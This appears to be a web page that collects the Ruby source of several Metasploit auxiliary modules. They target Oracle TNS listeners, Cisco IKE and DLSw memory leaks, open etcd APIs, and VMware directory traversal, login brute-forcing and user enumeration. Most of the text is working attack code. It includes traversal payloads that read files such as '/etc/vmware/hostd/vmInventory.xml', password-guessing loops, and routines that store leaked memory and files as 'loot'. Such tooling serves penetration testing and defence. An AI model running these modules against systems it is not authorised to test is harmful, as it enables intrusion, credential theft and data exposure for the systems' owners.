This Metasploit module checks the server for vulnerabilities like TNS Poison. Module sends a server a packet with command to register new TNS Listener and checks for a response indicating an error. If the registration is errored, the target is not vulnerable. Otherwise, the target is vulnerable to malicious registrations.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Exploit::Remote::TNS  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle TNS Listener Checker',      'Description'    => %q{        This module checks the server for vulnerabilities like TNS Poison.        Module sends a server a packet with command to register new TNS Listener and checks        for a response indicating an error. If the registration is errored, the target is not        vulnerable. Otherwise, the target is vulnerable to malicious registrations.      },      'Author'         => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]      'References'     =>        [          [ 'CVE', '2012-1675'],          [ 'URL', 'https://seclists.org/fulldisclosure/2012/Apr/204' ],        ],      'DisclosureDate' => '2012-04-18',      'License'        => MSF_LICENSE))    register_options(      [        Opt::RPORT(1521)      ])  end  def run_host(ip)    begin      connect      send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))")      sock.put(send_packet)      packet = sock.read(100)      if packet        hex_packet = Rex::Text.to_hex(packet, ':')        split_hex = hex_packet.split(':')        find_packet = /\(ERROR_STACK=\(ERROR=/ === packet        if find_packet == true #TNS Packet returned ERROR          print_error("#{ip}:#{rport} is not vulnerable")        elsif split_hex[5] == '02' #TNS Packet Type: ACCEPT          print_good("#{ip}:#{rport} is vulnerable")        elsif split_hex[5] == '04' #TNS Packet Type: REFUSE          print_error("#{ip}:#{rport} is not vulnerable")        else #All other TNS packet types or non-TNS packet type response cannot guarantee vulnerability          print_error("#{ip}:#{rport} might not be vulnerable")        end      else        print_error("#{ip}:#{rport} is not vulnerable")      end      # TODO: Module should report_vuln if this finding is solid.      rescue ::Rex::ConnectionError, ::Errno::EPIPE      print_error("#{ip}:#{rport} unable to connect to the server")    end  endend

Oracle TNS Listener Checker

Detect UDP endpoints with UDP amplification vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::DRDoS  include Msf::Auxiliary::Report  include Msf::Auxiliary::UDPScanner  def initialize    super(      'Name'        => 'UDP Amplification Scanner',      'Description' => 'Detect UDP endpoints with UDP amplification vulnerabilities',      'Author'      => 'Jon Hart <jon_hart[at]rapid7.com>',      'License'     => MSF_LICENSE,      'References'  =>        [          ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-017A']        ]    )    register_options(      [        OptString.new('PORTS', [true, 'Ports to probe']),        OptString.new('PROBE', [false, 'UDP payload/probe to send.  Unset for an empty UDP datagram, or the `file://` resource to get content from a local file'])      ]    )    # RPORT is unused in this scanner module because it supports multiple ports    deregister_options('RPORT')  end  def setup    super    unless (@ports = Rex::Socket.portspec_crack(datastore['PORTS']))      fail_with(Failure::BadConfig, "Unable to extract list of ports from #{datastore['PORTS']}")    end    @probe = datastore['PROBE'] ? datastore['PROBE'] : ''  end  def scanner_prescan(batch)    print_status("Sending #{@probe.length}-byte probes to #{@ports.length} port(s) on #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")    @results ||= {}  end  def scan_host(ip)    @ports.each do |port|      scanner_send(@probe, ip, port)    end  end  # Called for each response packet, overriding UDPScanner's so that we can  # store all responses on a per-host, per-port basis  def scanner_process(data, shost, sport)    @results[shost] ||= {}    @results[shost][sport] ||= []    @results[shost][sport] << data  end  def scanner_postscan(batch)    batch.each do |shost|      next unless @results.key?(shost)      @results[shost].each_pair do |sport, responses|        report_service(host: shost, port: sport, proto: 'udp', info: responses.inspect, state: 'open')        vulnerable, proof = prove_amplification(@probe => responses)        next unless vulnerable        print_good("#{shost}:#{sport} - susceptible to UDP amplification: #{proof}")        report_vuln(          host: shost,          port: sport,          proto: 'udp',          name: 'UDP amplification',          refs: references        )      end    end  endend

UDP Amplification Scanner

This Metasploit module detects VxWorks and the IPnet IP stack, along with devices vulnerable to CVE-2019-12258.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  include Msf::Exploit::Capture  def initialize(info = {})    super(update_info(info,      'Name'           => 'URGENT/11 Scanner, Based on Detection Tool by Armis',      'Description'    => %q{        This module detects VxWorks and the IPnet IP stack, along with devices        vulnerable to CVE-2019-12258.      },      'Author'         => [        'Ben Seri',   # Upstream tool        'Brent Cook', # Metasploit module        'wvu'         # Metasploit module      ],      'References'     => [        ['CVE', '2019-12258'],        ['URL', 'https://armis.com/urgent11'],        ['URL', 'https://github.com/ArmisSecurity/urgent11-detector']      ],      'DisclosureDate' => '2019-08-09', # NVD entry publication      'License'        => MSF_LICENSE,      'Notes'          => {'Stability' => [CRASH_SAFE]}    ))    register_options([      OptString.new('RPORTS', required: true, default: "21 22 23 80 443", desc: 'Target ports for TCP detections')    ])    register_advanced_options([      OptInt.new('RetransmissionRate', required: true, default: 3, desc: 'Send n TCP packets')    ])    deregister_options('PCAPFILE', 'FILTER')  end  #  # Utility methods  #  def rports    datastore['RPORTS'].split(/[\s,]/).collect{|i| (i.to_i.to_s == i) ? i.to_i : nil}.compact  end  def filter(ip)    "src host #{ip} and dst host #{Rex::Socket.source_address(ip)}"  end  #  # Scanner methods  #  def run_host(ip)    # XXX: Configuring Ethernet and IP headers sends a UDP packet!    @config = PacketFu::Utils.whoami?(target: ip)    open_pcap    capture.setfilter(filter(ip))    port_open = false    rports.each do |rport|      port_open |= run_detections(ip, rport)    end    raise RuntimeError.new("No ports open on #{ip} from #{datastore['RPORTS']}") if !port_open  rescue RuntimeError => e    fail_with(Failure::BadConfig, e.message)  ensure    close_pcap  end  def detections    %w[      tcp_dos_detection      tcp_malformed_options_detection      icmp_code_detection      icmp_timestamp_detection    ]  end  def run_detections(ip, port)    print_status("#{ip}:#{port} being checked")    final_ipnet_score        = 0    final_vxworks_score      = 0    affected_vulnerabilities = []    begin      sock = Rex::Socket::Tcp.create(        'PeerHost' => ip,        'PeerPort' => port      )    rescue      vprint_bad("Could not connect to #{ip}:#{port}, cannot verify vulnerability")      return false    end    detections.each do |detection|      @ipnet_score     = 0      @vxworks_score   = 0      @vulnerable_cves = []      detection_name = detection.camelize      begin        send(detection, sock, ip, port)      rescue StandardError => e        vprint_error("#{detection_name} failed: #{e.message}")        next      end      vprint_status(        "\t#{detection_name.ljust(30)}" \        "\tVxWorks: #{@vxworks_score}" \        "\tIPnet: #{@ipnet_score}"      )      final_ipnet_score        += @ipnet_score      final_vxworks_score      += @vxworks_score      affected_vulnerabilities += @vulnerable_cves    end    sock.close    if final_ipnet_score > 0      vprint_good("#{ip}:#{port} detected as IPnet")    elsif final_ipnet_score < 0      vprint_error("#{ip}:#{port} detected as NOT IPnet")    end    if final_vxworks_score > 100      vprint_good("#{ip}:#{port} detected as VxWorks")    elsif final_vxworks_score < 0      vprint_error("#{ip}:#{port} detected as NOT VxWorks")    end    affected_vulnerabilities.each do |vuln|      msg = "#{ip}:#{port} affected by #{vuln}"      print_good(msg)      report_vuln(        host: ip,        name: name,        refs: references,        info: msg      )    end    true  end  #  # TCP detection methods  #  def tcp_malformed_options_detection(sock, ip, port)    pkt = PacketFu::TCPPacket.new(config: @config)    # IP destination address    pkt.ip_daddr = ip    # TCP SYN with malformed options    pkt.tcp_dst       = port    pkt.tcp_flags.syn = 1    pkt.tcp_opts      = [2, 4, 1460].pack('CCn') + # MSS                        [1].pack('C') +            # NOP                        [3, 2].pack('CC') +        # WSCALE with invalid length                        [3, 3, 0].pack('CCC')      # WSCALE with valid length    pkt.recalc    res = nil    datastore['RetransmissionRate'].times do      pkt.to_w      res = inject_reply(:tcp)      break unless res    end    unless res      return @vxworks_score = 0,             @ipnet_score   = 50    end    if res.tcp_flags.rst == 1 &&      res.tcp_dst == pkt.tcp_src && res.tcp_dst == pkt.tcp_src      return @vxworks_score = 100,             @ipnet_score   = 100    end    return @vxworks_score = -100,           @ipnet_score   = -100  end  def tcp_dos_detection(sock, ip, port)    pkt = PacketFu::TCPPacket.new(config: @config)    # IP destination address    pkt.ip_daddr = ip    # TCP SYN with malformed (truncated) WS option    pkt.tcp_src       = sock.getlocalname.last    pkt.tcp_dst       = sock.peerport    pkt.tcp_seq       = rand(0xffffffff + 1)    pkt.tcp_ack       = rand(0xffffffff + 1)    pkt.tcp_flags.syn = 1    pkt.tcp_opts      = [3, 2].pack('CC') +    # WSCALE with invalid length                        [1, 0].pack('CC')      # NOP + EOL    pkt.recalc    res = nil    datastore['RetransmissionRate'].times do      pkt.to_w      res = inject_reply(:tcp)      break unless res    end    unless res      return @vxworks_score = 0,             @ipnet_score   = 0    end    if res.tcp_flags.rst == 1 &&      res.tcp_dst == pkt.tcp_src && res.tcp_dst == pkt.tcp_src      return @vxworks_score   = 100,             @ipnet_score     = 100,             @vulnerable_cves = ['CVE-2019-12258']    end    return @vxworks_score = 0,           @ipnet_score   = 0  end  #  # ICMP detection methods  #  def icmp_code_detection(sock, ip, _port = nil)    pkt = PacketFu::ICMPPacket.new(config: @config)    # IP destination address    pkt.ip_daddr = ip    # ICMP echo request with non-zero code    pkt.icmp_type = 8    pkt.icmp_code = rand(0x01..0xff)    pkt.payload   = capture_icmp_echo_pack    pkt.recalc    pkt.to_w    res = inject_reply(:icmp)    unless res      return @ipnet_score = 0    end    # Echo reply with zeroed code    if res.icmp_type == 0 && res.icmp_code == 0      return @ipnet_score = 20    end    @ipnet_score = -20  end  def icmp_timestamp_detection(sock, ip, _port = nil)    pkt = PacketFu::ICMPPacket.new(config: @config)    # IP destination address    pkt.ip_daddr = ip    # Truncated ICMP timestamp request    pkt.icmp_type = 13    pkt.icmp_code = 0    pkt.payload   = "\x00" * 4    pkt.recalc    pkt.to_w    res = inject_reply(:icmp)    unless res      return @ipnet_score = 0    end    # Timestamp reply    if res.icmp_type == 14      return @ipnet_score = 90    end    @ipnet_score = -30  endend

URGENT/11 Scanner, Based On Detection Tool By Armis

A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information. The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'           => 'Cisco IKE Information Disclosure',      'Description'    => %q{        A vulnerability in Internet Key Exchange version 1 (IKEv1) packet        processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software        could allow an unauthenticated, remote attacker to retrieve memory        contents, which could lead to the disclosure of confidential information.        The vulnerability is due to insufficient condition checks in the part        of the code that handles IKEv1 security negotiation requests.        An attacker could exploit this vulnerability by sending a crafted IKEv1        packet to an affected device configured to accept IKEv1 security        negotiation requests. A successful exploit could allow the attacker        to retrieve memory contents, which could lead to the disclosure of        confidential information.      },      'Author'         => [ 'Nixawk' ],      'License'        => MSF_LICENSE,      'References'     =>        [          [ 'CVE', '2016-6415' ],          [ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ],          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ],          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ],          [ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ]        ],      'DisclosureDate' => '2016-09-29'    ))    register_options(      [        Opt::RPORT(500),        OptPath.new('PACKETFILE',          [ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ])      ])  end  def run_host(ip)    begin      isakmp_pkt = File.read(datastore['PACKETFILE'])      peer = "#{ip}:#{datastore['RPORT']}"      udp_sock = Rex::Socket::Udp.create(        {          'Context' => { 'Msf' => framework, 'MsfExploit' => self }        }      )      add_socket(udp_sock)      udp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i)      res = udp_sock.get(3)      return unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data...      # Convert non-printable characters to periods      printable_data = res.gsub(/[^[:print:]]/, '.')      # Show abbreviated data      vprint_status("Printable info leaked:\n#{printable_data}")      chars = res.unpack('C*')      len = (chars[30].to_s(16) + chars[31].to_s(16)).hex      return if len <= 0      print_good("#{peer} - IKE response with leak")      report_vuln({        :host => ip,        :port => datastore['RPORT'],        :proto => 'udp',        :name => self.name,        :refs => self.references,        :info => "Vulnerable to Cisco IKE Information Disclosure"      })      # NETWORK may return the same packet data.      return if res.length < 2500      pkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length-2500, isakmp_pkt.length])      res_md5 = ::Rex::Text.md5(res[res.length-2500, res.length])      print_warning("#{peer} - IKE response is same to payload data") if pkt_md5 == res_md5    rescue    ensure      udp_sock.close    end  endend

Cisco IKE Information Disclosure

This Metasploit module queries the etcd API to recursively retrieve all of the stored key value pairs. Etcd by default does not utilize authentication.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Etcd  include Msf::Auxiliary::Scanner  def initialize    super(      'Name' => 'Etcd Keys API Information Gathering',      'Description' => %q(        This module queries the etcd API to recursively retrieve all of the stored        key value pairs.  Etcd by default does not utilize authentication.      ),      'References' => [        ['URL', 'https://gcollazo.com/the-security-footgun-in-etcd/']      ],      'Author' => [        'Giovanni Collazo <hello@gcollazo.com>', # discovery        'h00die' # msf module      ],      'License' => MSF_LICENSE,      'DisclosureDate' => "Mar 16 2018"    )  end  def run_host(_target_host)    path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')    banner = fingerprint_service(target_uri.to_s)    vprint_status("#{peer} - Collecting data through #{path}...")    res = send_request_raw(      'uri'    => path,      'method' => 'GET'    )    # parse the json if we got a good request back    if res && res.code == 200      begin        response = res.get_json_document        store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')      rescue JSON::ParserError => e        print_error("Failed to read JSON: #{e.class} - #{e.message}}")        return      end      print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")    elsif res      vprint_errord("Invalid response #{res.code} for etcd open keys response")      return    else      verbose_error("No response for etcd open keys probe")      return    end  endend

Etcd Keys API Information Gathering

This Metasploit modules exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files. Common VMware server ports 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out the gueststealer tool.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  # Exploit mixins should be called first  include Msf::Exploit::Remote::HttpClient  # Scanner mixin should be near last  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'VMware Server Directory Traversal Vulnerability',      'Description' => 'This modules exploits the VMware Server Directory Traversal        vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before        2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5        allows remote attackers to read arbitrary files. Common VMware server ports        80/8222 and 443/8333 SSL.  If you want to download the entire VM, check out        the gueststealer tool.',      'Author'      => 'CG' ,      'License'     => MSF_LICENSE,      'References'  =>        [          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],          [ 'OSVDB', '59440' ],          [ 'BID', '36842' ],          [ 'CVE', '2009-3733' ],          [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]        ]    )    register_options(      [        Opt::RPORT(8222),        OptString.new('FILE', [ true,  "The file to view", '/etc/vmware/hostd/vmInventory.xml']),        OptString.new('TRAV', [ true,  "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),      ])  end  def run_host(target_host)    begin      file = datastore['FILE']      trav = datastore['TRAV']      res = send_request_raw({        'uri'          => trav+file,        'version'      => '1.1',        'method'       => 'GET'      }, 25)      if res.nil?        print_error("Connection timed out")        return      end      if res.code == 200        #print_status("Output Of Requested File:\n#{res.body}")        print_good("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")        report_vuln(          {            :host   => target_host,            :port  => rport,            :proto  => 'tcp',            :name  => self.name,            :info   => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",            :refs   => self.references,            :exploited_at => Time.now.utc          }        )      else        vprint_status("Received #{res.code} for #{trav}#{file}")      end    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e      print_error(e.message)    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

VMware Server Directory Traversal

This Metasploit module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::VIMSoap  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'VMWare Web Login Scanner',      'Description'    => 'This module attempts to authenticate to the VMWare HTTP service        for VmWare Server, ESX, and ESXI',      'Author'         => ['theLightCosine'],      'References'     =>        [          [ 'CVE', '1999-0502'] # Weak password        ],      'License'        => MSF_LICENSE,      'DefaultOptions' => { 'SSL' => true }    )    register_options(      [        OptString.new('URI', [true, "The default URI to login with", "/sdk"]),        Opt::RPORT(443)      ])  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: 'vmware',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: DateTime.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def run_host(ip)    return unless is_vmware?    each_user_pass { |user, pass|      result = vim_do_login(user, pass)      case result      when :success        print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)        return if datastore['STOP_ON_SUCCESS']      when :fail        print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"      end    }  end  # Mostly taken from the Apache Tomcat service validator  def is_vmware?    soap_data =      %Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">      <env:Body>      <RetrieveServiceContent xmlns="urn:vim25">        <_this type="ServiceInstance">ServiceInstance</_this>      </RetrieveServiceContent>      </env:Body>      </env:Envelope>|    res = send_request_cgi({      'uri'     => normalize_uri(datastore['URI']),      'method'  => 'POST',      'agent'   => 'VMware VI Client',      'data'    => soap_data    }, 25)    unless res      vprint_error("#{rhost}:#{rport} Error: no response")      return false    end    fingerprint_vmware(res)  rescue ::Rex::ConnectionError => e    vprint_error("#{rhost}:#{rport} Error: could not connect")    return false  rescue => e    vprint_error("#{rhost}:#{rport} Error: #{e}")    return false  end  def fingerprint_vmware(res)    unless res      vprint_error("#{rhost}:#{rport} Error: no response")      return false    end    return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')    os_match = res.body.match(/<name>([\w\s]+)<\/name>/)    ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/)    build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)    full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)    if full_match      print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"      report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])    end    unless os_match and ver_match and build_match      vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare")      return false    end    if os_match[1].include?('ESX') || os_match[1].include?('vCenter')      # Report a fingerprint match for OS identification      report_note(        :host  => rhost,        :ntype => 'fingerprint.match',        :data  => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }      )      return true    end  endend

VMWare Web Login Scanner

This Metasploit modules exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info={})    super(update_info(info,      'Name'           => "VMWare Update Manager 4 Directory Traversal",      'Description'    => %q{        This modules exploits a directory traversal vulnerability in VMWare Update Manager        on port 9084.  Versions affected by this vulnerability: vCenter Update Manager        4.1 prior to Update 2, vCenter Update Manager 4 Update 4.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Alexey Sintsov',  #Initial discovery, poc          'sinn3r'           #Metasploit        ],      'References'     =>        [          ['CVE', '2011-4404'],          ['EDB', '18138'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2011-0014.html'],          ['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']        ],      'DisclosureDate' => '2011-11-21'))    register_options(      [        Opt::RPORT(9084),        OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),        OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])      ])  end  def run_host(ip)    fname     = File.basename(datastore['FILE'])    traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"    uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']    print_status("#{rhost}:#{rport} - Requesting: #{uri}")    res = send_request_raw({      'method' => 'GET',      'uri'    => uri    }, 25)    # If there's no response, don't bother    if res.nil? or res.body.empty?      print_error("No content retrieved from: #{ip}")      return    end    if res.code == 404      print_error("#{rhost}:#{rport} - File not found")      return    else      print_good("File retrieved from: #{ip}")      p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)      print_good("File stored in: #{p}")    end  endend

VMWare Update Manager 4 Directory Traversal

This Metasploit module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::VIMSoap  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'VMWare Enumerate User Accounts',      'Description'    => %Q{        This module will log into the Web API of VMWare and try to enumerate        all the user accounts. If the VMware instance is connected to one or        more domains, it will try to enumerate domain users as well.      },      'Author'         => ['theLightCosine'],      'License'        => MSF_LICENSE,      'DefaultOptions' => { 'SSL' => true }    )    register_options(      [        Opt::RPORT(443),        OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),        OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ])      ])  end  def run_host(ip)    if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success      # Get local Users and Groups      user_list = vim_get_user_list(nil)      tmp_users = Rex::Text::Table.new(        'Header'  => "Users for server #{ip}",        'Indent'  => 1,        'Columns' => ['Name', 'Description']      )      tmp_groups = Rex::Text::Table.new(        'Header'  => "Groups for server #{ip}",        'Indent'  => 1,        'Columns' => ['Name', 'Description']      )      unless user_list.nil?        case user_list        when :noresponse          print_error "Received no response from #{ip}"        when :expired          print_error "The login session appears to have expired on #{ip}"        when :error          print_error "An error occurred while trying to enumerate the users for #{domain} on #{ip}"        else          user_list.each do |obj|            if obj['group'] == 'true'              tmp_groups << [obj['principal'], obj['fullName']]            else              tmp_users <<  [obj['principal'], obj['fullName']]            end          end          print_good tmp_groups.to_s          store_loot('host.vmware.groups', "text/plain", datastore['RHOST'], tmp_groups.to_csv , "#{datastore['RHOST']}_esx_groups.txt", "VMWare ESX User Groups")          print_good tmp_users.to_s          store_loot('host.vmware.users', "text/plain", datastore['RHOST'], tmp_users.to_csv , "#{datastore['RHOST']}_esx_users.txt", "VMWare ESX Users")        end      end      # Enumerate Domains the Server is connected to      esx_domains = vim_get_domains      case esx_domains      when :noresponse        print_error "Received no response from #{ip}"      when :expired        print_error "The login session appears to have expired on #{ip}"      when :error        print_error "An error occurred while trying to enumerate the domains on #{ip}"      else        # Enumerate Domain Users and Groups        esx_domains.each do |domain|          tmp_dusers = Rex::Text::Table.new(            'Header'  => "Users for domain #{domain}",            'Indent'  => 1,            'Columns' => ['Name', 'Description']          )          tmp_dgroups = Rex::Text::Table.new(            'Header'  => "Groups for domain #{domain}",            'Indent'  => 1,            'Columns' => ['Name', 'Description']          )          user_list = vim_get_user_list(domain)          case user_list          when nil            next          when :noresponse            print_error "Received no response from #{ip}"          when :expired            print_error "The login session appears to have expired on #{ip}"          when :error            print_error "An error occurred while trying to enumerate the users for #{domain} on #{ip}"          else            user_list.each do |obj|              if obj['group'] == 'true'                tmp_dgroups << [obj['principal'], obj['fullName']]              else                tmp_dusers <<  [obj['principal'], obj['fullName']]              end            end            print_good tmp_dgroups.to_s            f = store_loot('domain.groups', "text/plain", datastore['RHOST'], tmp_dgroups.to_csv , "#{domain}_esx_groups.txt", "VMWare ESX #{domain} Domain User Groups")            vprint_status("VMWare domain user groups stored in: #{f}")            print_good tmp_dusers.to_s            f = store_loot('domain.users', "text/plain", datastore['RHOST'], tmp_dgroups.to_csv , "#{domain}_esx_users.txt", "VMWare ESX #{domain} Domain Users")            vprint_status("VMWare users stored in: #{f}")          end        end      end    else      print_error "Login failure on #{ip}"      return    end  endend

VMWare Enumerate User Accounts

This Metasploit module implements the DLSw information disclosure retrieval. There is a bug in Ciscos DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'socket'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'           => 'Cisco DLSw Information Disclosure Scanner',      'Description'    => %q(        This module implements the DLSw information disclosure retrieval. There        is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains        that allows an unauthenticated remote attacker to retrieve the partial        contents of packets traversing a Cisco router with DLSw configured        and active.      ),      'Author'         => [        'Tate Hansen', # Vulnerability discovery        'John McLeod', # Vulnerability discovery        'Kyle Rainey' # Built lab to recreate vulnerability and help test      ],      'References'     =>        [          ['CVE', '2014-7992'],          ['URL', 'https://github.com/tt5555/dlsw_exploit']        ],      'DisclosureDate' => 'Nov 17 2014',      'License'        => MSF_LICENSE    )    register_options(      [        Opt::RPORT(2067),        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])      ])  end  def get_response(size = 72)    connect    response = sock.get_once(size)    disconnect    response  end  # Called when using check  def check_host(_ip)    print_status("Checking for DLSw information disclosure (CVE-2014-7992)")    response = get_response    if response.blank?      vprint_status("No response")      Exploit::CheckCode::Safe    elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"      vprint_good("Detected DLSw protocol")      report_service(        host: rhost,        port: rport,        proto: 'tcp',        name: 'dlsw'      )      # TODO: check that response has something that truly indicates it is vulnerable      # and not simply that it responded      unless response[18..72].scan(/\x00/).length == 54        print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")        report_vuln(          host: rhost,          port: rport,          name: name,          refs: references,          info: "Module #{fullname} collected #{response.length} bytes"        )        Exploit::CheckCode::Vulnerable      end    else      vprint_status("#{response.size}-byte response didn't contain any leaked data")      Exploit::CheckCode::Safe    end  end  # Main method  def run_host(ip)    return unless check_host(ip) == Exploit::CheckCode::Vulnerable    dlsw_data = ''    until dlsw_data.length > datastore['LEAK_AMOUNT']      response = get_response      dlsw_data << response[18..72] unless response.blank?    end    loot_and_report(dlsw_data)  end  def loot_and_report(dlsw_leak)    path = store_loot(      'dlsw.packet.contents',      'application/octet-stream',      rhost,      dlsw_leak,      'DLSw_leaked_data',      'DLSw packet memory leak'    )    print_status("DLSw leaked data stored in #{path}")  endend

Tag

#auth